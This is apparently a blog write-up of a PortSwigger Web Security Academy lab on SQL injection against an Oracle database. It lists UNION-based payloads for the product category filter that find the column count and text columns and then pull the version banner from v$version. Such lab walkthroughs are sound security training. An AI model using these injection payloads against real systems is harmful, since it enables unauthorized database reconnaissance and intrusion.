Lab: SQL injection attack, querying the database type and version on Oracle

Posted on 2023-04-25 | Post modified | In Security｜Practice｜Portswigger Web Security Academy｜SQL |

Lab: SQL injection attack, querying the database type and version on Oracle

tags: `Portswigger Web Security Academy` `Web`

Description: This lab contains a SQL injection vulnerability in the product category filter. You can use a UNION attack to retrieve the results from an injected query.
Our Goal: To solve the lab, display the database version string.

Exp - SQLi Cheat Sheet - Examining the database in SQL injection attacks

According to the cheat sheet above, we can use the command to fetch the version of this database, e.g. :::warning Before the recon, the hint told you that this database is created by Oracle. So, you must contained From preserved word in each query, e.g. SELECT 'abc' FROM dual :::

Determine # of columns that are being returned by the query Payload: ?category=Gifts' union select NULL,NULL from v$version--
Which columns contain text data Payload: ?category=Gifts' union select 'a','b' from v$version-- Two of them are text data
Attack Payload: ?category=Gifts' UNION SELECT BANNER,'abc' FROM v$version-- :::spoiler Result :::

Reference

Post author: SBK6401
Post link: https://bernie6401.github.io/Lab_-SQL-injection-attack,-querying-the-database-type-and-version-on-Oracle/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.

Lab: SQL injection attack, querying the database type and version on Oracle

tags: Portswigger Web Security Academy Web

Exp - SQLi Cheat Sheet - Examining the database in SQL injection attacks

Reference

tags: `Portswigger Web Security Academy` `Web`